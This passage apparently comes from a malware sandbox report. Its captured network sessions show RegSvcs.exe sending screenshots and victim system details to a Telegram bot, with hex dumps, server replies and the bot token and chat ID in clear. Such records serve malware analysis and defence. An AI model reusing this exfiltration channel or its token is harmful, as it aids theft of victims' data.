12-57-33.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZpmdSg0JvKem4r_xgigefiYFbLLJzAAL0FAACOh6ZUgq9r-UGN9C3AQAHbQADNgQ","file_unique_id":"AQAD9BQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZpmdSg0JvKem4r_xgigefiYFbLLJzAAL0FAACOh6ZUgq9r-UGN9C3AQAHbQADNgQ","file_unique_id":"AQAD9BQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaZnUoNCbynpuK_8YIoHn4mBWyyycwAC9BQAAjoemVIKva_lBjfQtzYE","file_unique_id":"AgAD9BQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/11/2025 12:57:24\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49968	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:28 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd4ec7e1fd0ec5 Host: api.telegram.org Content-Length: 66946 Expect: 100-continue
2024-12-06 04:53:29 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 65 63 37 65 31 66 64 30 65 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 65 63 37 65 31 66 64 30 65 63 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 36 2f 32 30 32 35 20 32 30 3a 31 34 3a 31 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd4ec7e1fd0ec5Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd4ec7e1fd0ec5Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/16/2025 20:14:15User
2024-12-06 04:53:29 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:29 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:29 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:29 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:29 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:29 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 65 63 37 65 31 66 64 30 65 63 35 2d 2d 0d 0a Data Ascii: -----------------------------8dd4ec7e1fd0ec5--
2024-12-06 04:53:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:30 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:29 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170408,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460809,"document":{"file_name":"user-610930 2025-02-16 20-24-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZqGdSg0nQDBk0w3lEp11sdqoxaaDuAAL1FAACOh6ZUmznjCYFrxzAAQAHbQADNgQ","file_unique_id":"AQAD9RQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZqGdSg0nQDBk0w3lEp11sdqoxaaDuAAL1FAACOh6ZUmznjCYFrxzAAQAHbQADNgQ","file_unique_id":"AQAD9RQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmahnUoNJ0AwZNMN5RKddbHaqMWmg7gAC9RQAAjoemVJs54wmBa8cwDYE","file_unique_id":"AgAD9RQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/16/2025 20:14:15\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49969	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:30 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd50f26f7fcbb6 Host: api.telegram.org Content-Length: 66946 Expect: 100-continue
2024-12-06 04:53:30 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 30 66 32 36 66 37 66 63 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 30 66 32 36 66 37 66 63 62 62 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 39 2f 32 30 32 35 20 31 34 3a 32 33 3a 35 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd50f26f7fcbb6Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd50f26f7fcbb6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/19/2025 14:23:53User
2024-12-06 04:53:30 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:30 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:53:30 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:53:30 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:53:30 UTC	1360	OUT	Data Raw: 28 a2 8a 60 14 51 45 00 6b dc f8 9f 5c b8 ba 96 7f ed 5b c8 bc c7 2f e5 c5 70 ea 8b 93 9c 28 cf 00 76 a8 e5 d7 2f a7 9e 19 ee 24 f3 e6 8a da 4b 6f 32 52 cc cc ae 1c 12 49 3c 90 24 38 fa 0a cc a2 90 5c 28 a2 8a 00 28 a2 8a 60 75 d3 78 c6 2b 98 e2 49 6d 1e 3f 2d 70 0a b0 6c ff 00 2c 74 a9 26 f1 b4 33 c5 e5 36 9a 62 07 ab ac 81 8f e5 81 fc eb 8d a2 b2 54 a0 94 12 5f 0e ab 7e f7 1b 93 6e 4f f9 b7 3a 2d 63 c4 ab a8 e9 0b a7 25 b3 2a ab 86 f3 19 b9 38 cf 6c 7b fa d7 3b 45 15 51 8a 8d ed d5 dc 1b 6e c9 f4 0a 28 a2 a8 46 f6 95 ab 20 89 60 9d b6 32 f0 ad ea 2b ae d3 75 3b bb 86 da f7 80 40 83 2f 21 da 0e 3d 37 75 fd 6b cc e8 ae 7a 94 5c 93 50 95 ae 67 1a 6a 33 e6 e9 d8 ed fc 55 e2 78 1e d5 ec 2c 24 12 19 06 24 91 7a 01 e8 3d 6b 88 a2 8a 30 f8 78 61 e1 c9 03 a2 a5 Data Ascii: (`QEk\[/p(v/$Ko2RI<$8\((`ux+Im?-pl,t&36bT_~nO:-c%*8l{;EQn(F `2+u;@/!=7ukz\Pgj3Ux,$$z=k0xa
2024-12-06 04:53:30 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 30 66 32 36 66 37 66 63 62 62 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd50f26f7fcbb6--
2024-12-06 04:53:30 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:53:31 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:53:31 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170409,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460811,"document":{"file_name":"user-610930 2025-02-19 14-33-53.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZqWdSg0st3hI_xA7yPyvuuaSSWF3LAAL2FAACOh6ZUqFZzL1J2ZHxAQAHbQADNgQ","file_unique_id":"AQAD9hQAAjoemVJy","file_size":12289,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZqWdSg0st3hI_xA7yPyvuuaSSWF3LAAL2FAACOh6ZUqFZzL1J2ZHxAQAHbQADNgQ","file_unique_id":"AQAD9hQAAjoemVJy","file_size":12289,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmalnUoNLLd4SP8QO8j8r7rmkklhdywAC9hQAAjoemVKhWcy9SdmR8TYE","file_unique_id":"AgAD9hQAAjoemVI","file_size":66325},"caption":"New SC Recovered!\n\nTime: 02/19/2025 14:23:53\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50000	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:53:41 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd567673718542 Host: api.telegram.org Content-Length: 66946 Expect: 100-continue
2024-12-06 04:53:42 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 37 36 37 33 37 31 38 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 36 37 36 37 33 37 31 38 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 32 36 2f 32 30 32 35 20 31 35 3a 30 31 3a 32 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd567673718542Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd567673718542Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/26/2025 15:01:23User
2024-12-06 04:53:42 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:53:42 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
